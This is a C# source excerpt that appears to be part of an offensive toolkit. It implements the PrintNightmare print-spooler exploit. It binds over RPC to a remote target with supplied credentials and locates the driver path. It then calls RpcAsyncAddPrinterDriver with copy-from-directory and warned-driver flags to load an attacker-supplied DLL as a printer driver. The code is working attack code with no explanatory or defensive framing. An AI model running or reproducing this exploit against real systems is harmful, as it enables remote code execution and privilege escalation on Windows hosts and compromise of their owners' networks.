public static bool RunPrintNightmare(string target, string exploit_path, string authuser, string authdomain, string authpassword, int auth = DCSync.RPC_C_AUTHN_GSS_NEGOTIATE, string altservice = "host") { Console.WriteLine("[*] "); rpcConn = DCSync.CreateBinding(target, altservice, auth, authuser, authdomain, authpassword, impersonationType: DCSync.RPC_C_IMP_LEVEL_DELEGATE); if (rpcConn == IntPtr.Zero) { Console.WriteLine("Error CreateBinding"); return(false); } NTSTATUS rpcStatus = (NTSTATUS)RpcEpResolveBinding(rpcConn, GetClientInterface()); if (rpcStatus != NTSTATUS.Success) { Console.WriteLine("[x] Error RpcEpResolveBinding {0}", (int)rpcStatus); return(false); } rpcStatus = (NTSTATUS)RpcBindingSetObject(rpcConn, ref PAR_ObjectUUID); if (rpcStatus != NTSTATUS.Success) { Console.WriteLine("[x] Error RpcBindingSetOption {0}", (int)rpcStatus); return(false); } string driverpath = FindDriverPath(rpcConn); driverpath += "\\unidrv.dll"; Console.WriteLine("[*] DriverPath: {0}", driverpath); string environment = "Windows x64"; DRIVER_INFO_2 dvi2 = new DRIVER_INFO_2 { cVersion = 3, pDataFile = exploit_path, pEnvironment = environment, pDriverPath = driverpath, pName = RandomString(10) }; if (AddPrinterDriver(dvi2, rpcConn, "C:\\Windows\\System32\\kernelbase.dll")) { dvi2.pName = RandomString(10); string[] p = exploit_path.Split('\\'); if (AddPrinterDriver(dvi2, rpcConn, p[p.Length - 1])) { Console.WriteLine(); return(true); } } return(false); }
List <String> GetInstalledPrinterDrivers() { /* * 'To determine the required buffer size, * 'call EnumPrinterDrivers with cbBuffer set * 'to zero. The call will fails specifying * 'ERROR_INSUFFICIENT_BUFFER and filling in * 'cbRequired with the required size, in bytes, * 'of the buffer required to hold the array * 'of structures and data. */ uint cbNeeded = 0; uint cReturned = 0; if (EnumPrinterDrivers(null, null, 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned)) { //succeeds, but shouldn't, because buffer is zero (too small)! throw new Exception("EnumPrinters should fail!"); } int lastWin32Error = Marshal.GetLastWin32Error(); //ERROR_INSUFFICIENT_BUFFER = 122 expected, if not -> Exception if (lastWin32Error != 122) { throw new Win32Exception(lastWin32Error); } IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded); if (EnumPrinterDrivers(null, null, 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned)) { DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned]; int offset = pAddr.ToInt32(); Type type = typeof(DRIVER_INFO_2); int increment = Marshal.SizeOf(type); for (int i = 0; i < cReturned; i++) { printerInfo2[i] = (DRIVER_INFO_2)Marshal.PtrToStructure(new IntPtr(offset), type); offset += increment; } Marshal.FreeHGlobal(pAddr); List <String> result = new List <string>(); for (int i = 0; i < cReturned; i++) { result.Add(printerInfo2[i].pName); } return(result); } throw new Win32Exception(Marshal.GetLastWin32Error()); }
private static bool AddPrinterDriver(DRIVER_INFO_2 dvi2, IntPtr hBinding, string cfg) { DRIVER_CONTAINER container = new DRIVER_CONTAINER(); uint dwFlags = 0x00000010 | 0x8000; // APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER; container.Level = 2; string sConfig = ""; if (cfg.IndexOf('\\') <= 0) { sConfig = string.Format("c:\\windows\\system32\\spool\\drivers\\x64\\3\\{0}", cfg); dwFlags |= 0x00000008;// APD_COPY_NEW_FILES } else { sConfig = cfg; dwFlags |= 0x00000004;// APD_COPY_ALL_FILES } dvi2.pConfigFile = sConfig; Console.WriteLine("[!] ConfigFile: {0}", dvi2.pConfigFile); IntPtr pDvi2 = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(DRIVER_INFO_2))); Marshal.StructureToPtr(dvi2, pDvi2, false); container.DriverInfo = pDvi2; IntPtr pContainer = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(DRIVER_CONTAINER))); Marshal.StructureToPtr(container, pContainer, false); NTSTATUS ret = (NTSTATUS)RpcAsyncAddPrinterDriver(GetStubPtr(), GetProcStringPtr(116), hBinding, null, pContainer, dwFlags); if (ret == NTSTATUS.Success) { Console.WriteLine("[*] OK!"); return(true); } else { Console.WriteLine("[x] KO! " + ret); } return(false); }